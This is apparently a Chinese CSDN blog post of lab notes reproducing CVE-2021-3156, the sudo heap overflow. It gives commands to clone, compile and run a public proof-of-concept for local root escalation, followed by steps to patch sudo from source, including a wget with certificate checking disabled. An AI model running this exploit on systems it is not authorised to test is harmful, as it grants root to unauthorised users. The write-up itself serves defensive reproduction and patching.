CVE-2021-3156漏洞复现笔记

最新推荐文章于 2024-06-14 12:39:24 发布
最新推荐文章于 2024-06-14 12:39:24 发布
阅读量1.2k 收藏 5
点赞数
分类专栏: web安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011975363/article/details/117919184
版权

漏洞简介

漏洞名称: Sudo 缓冲区溢出漏洞(CVE-2021-3156)
漏洞定级:高 危
漏洞描述: 在 sudo 中发现一个缺陷。在 sudo 解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户(普通用户和系统用户,sudoers 和非 sudoers)都可以利用此漏洞,而无需进行身份验证(即,攻击者不需要知道用户的密码),利用此漏洞可以用于普通用户无差别提权,漏洞对数据机密性和完整性以及系统可用性带来严重威胁。
影响范围:
sudo: 1.8.2 - 1.8.31p2
sudo: 1.9.0 - 1.9.5p1

复现过程

  • 判断是否存在漏洞
    在这里插入图片描述
  • 切换普通用户

在这里插入图片描述
下载poc 并编译

git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
make
chmod a+x sudo-hax-me-a-sandwich

执行poc

./sudo-hax-me-a-sandwich 0

在这里插入图片描述
在这里插入图片描述

修复

修复之前进行数据备份

目前官方已在sudo新版本1.9.5p2中修复了该漏洞,请受影响的用户尽快升级版本进行防护,官方下载链接:https://www.sudo.ws/download.html

下载升级包

 wget https://www.sudo.ws/dist/sudo-1.9.5p2.tar.gz --no-check-certificate

解压升级包

tar -zvxf sudo-1.9.5p2.tar.gz

进入解压后的文件夹

cd sudo-1.9.5p2

编译

./configure --prefix=/usr --libexecdir=/usr/lib --with-secure-path --with-all-insults --with-env-editor --docdir=/usr/share/doc/sudo-1.9.5p2 --with-passprompt="[sudo] password for %p: " && make && make install && ln -sfv libsudo_util.so.0.0.0 /usr/lib/sudo/libsudo_util.so.0

在这里插入图片描述

查看升级后sudo版本

sudo -V

在这里插入图片描述修复成功。

如果相应的软件源已经更新了 sudo,也可以直接通过 yum 或者 apt-get 来直接升级 yum -y upgrade sudo

小心灵呀
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
CVE-2021-3156 漏洞复现笔记
weixin_46483787的博客
07-01 1万+
CVE-2021-3156复现笔记
log4j2 CVE-2021-44228漏洞复现
qq_14902381的博客
08-10 704
vulfocus靶场log4j2 漏洞CVE-2021-44228复现
CVE-2021-3156】——漏洞复现、原理分析以及漏洞修复
IronmanJay的博客
06-01 2192
2021年01月27日,RedHat官方发布了Sudo缓冲区/栈溢出漏洞的风险通告,普通用户可以通过利用此漏洞,而无需进行身份验证,成功获取Root权限。
海康摄像头CVE-2021-36260漏洞复现
Karka_的博客
06-06 829
攻击者利用该漏洞可以用无限制的 root shell 来完全控制设备,即使设备的所有者受限于有限的受保护 shell(psh)。除了入侵 IP摄像头外,还可以访问和攻击内部网络。该漏洞的利用并不需要用户交互,攻击者只需要访问 http 或 HTTPS服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。
CVE-2021-1675 Print Spooler漏洞复现远程执行及提权
m0_55937801的博客
04-09 5109
CVE-2021-1675
CVE-2022-30190 漏洞复现
weixin_53884648的博客
11-10 5979
通过exp实现了对微软目前存在的office-word-2016的成功复现
漏洞复现笔记CVE-2021-43798)
最新发布
weixin_72760965的博客
06-14 302
Grafana 是一个用于监控和可观察性的开源平台。Grafana 版本 8.0.0-beta1 到 8.3.0(补丁版本除外)容易受到目录遍历,允许访问本地文件。易受攻击的 URL 路径是:<grafana_host_url>/public/plugins//,其中是任何已安装插件的插件 ID。建议用户升级到补丁版本 8.0.7、8.1.8、8.2.7 或 8.3.1。GitHub 安全公告包含有关易受攻击的 URL 路径、缓解措施和披露时间表的更多信息。使用vulhub进行环境搭建。
简单的Apache Airflow(CVE-2022-40127)漏洞复现
kali_Ma的博客
12-09 1498
Apache Airflow 是一个可编程,调度和监控的工作流平台,基于有向无环图(DAG),Airflow 可以定义一组有依赖的任务,按照依赖依次执行。官方已发布版本 2.4.3,可升级Apache Airflow版本到2.4.0或以上,或者停用默认 Dags。当攻击者可访问到Apache Airflow的后台,且环境中存在默认。
Log4j2 RCE(CVE-2021-44228)漏洞复现
博客地址 www.sec0nd.top
02-23 2228
Log4j2 RCE(CVE-2021-44228)漏洞复现 文章目录Log4j2 RCE(CVE-2021-44228)漏洞复现准备环境复现过程:用JNDIExploit启动一个ldap的服务使用BP抓包工具构造一个请求不足总结 准备环境 Log4j2这个漏洞是我第一次复现,因为还未学到javaweb方面的东西,就一直搁置着这个 首先把师傅给的项目文件运行一下 发现报错,这里有一行不完整,因为我也不清楚这里应该是什么就先忽略了。 忽略这行不完整的,可以正常运行 下面状态栏可以看到打开了8080端口,
CVE-2020-35606漏洞复现,已完结
weixin_51203422的博客
09-27 3019
GitHub - KrE80r/webmin_cve-2019-12840_poc: A standalone POC for CVE-2019-12840A standalone POC for CVE-2019-12840. Contribute to KrE80r/webmin_cve-2019-12840_poc development by creating an account on GitHub.https://github.com/KrE80r/webmin_cve-2019-12840_p
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-3156:有关CVE-2021-3156的注意事项
05-24
CVE-2021-3156 注意:这些说明是我自己的,并摘自我做过的信息流。 如果有任何问题,请通知我。 首先信任官方消息! 大家好, 几天前,在sudo中发现了严重的基于堆的缓冲区溢出,任何本地用户都可以利用该缓冲区...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
vmware 14 安装window 7时,出现Network boot from Intel E1000
热门推荐
u011975363的专栏
08-21 6万+
准备在vmware 14上安装window 7系统,在网上系统之家下载了个iso的镜像,按照网上的步骤: 先创建windows 虚拟机 在启动时,选择下载的iso镜像文件 网络设置选择NAT模式 点击启动时,却出现:operating system not found 当时还以为虚拟机设置出问题了,根据网上的教程,启动时进入bois系统进行设置: 在boot中将启动设...
xray与burp联动扫描
u011975363的专栏
05-12 2万+
上一篇博客主要描述利用xray挂代理进行被动扫描,但扫描器只能扫描出owasp top 10的漏洞,业务逻辑类漏洞需手工抓包进行测试,为了让被动扫描和手工测试 双管齐下,我们将xray与burp进行联动,在burp上配置xray代理,将burp流量转发给xray扫描,这样便可坐收漏洞了。
shiro反序列化漏洞复现
u011975363的专栏
10-08 1万+
搭建环境请参考:https://www.jianshu.com/p/0007eafd1f92 复现请参考:https://mp.weixin.qq.com/s/KkWL9SftCZSdkglW39Qw0Q 靶机:192.168.19.147 攻击机:192.168.19.146 • 搭建环境 获取docker镜像 Docker pull medicean/vulapps:s_shiro_1 重启d...
cve-2021-40444漏洞kali复现
04-06
由于cve-2021-40444漏洞的严重性,建议仅在合法授权的测试环境中进行复现和测试,不要在生产环境中尝试。 以下是在Kali Linux中复现cve-2021-40444漏洞的步骤: 1. 安装 OpenOffice 打开终端并输入以下命令: ``...
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值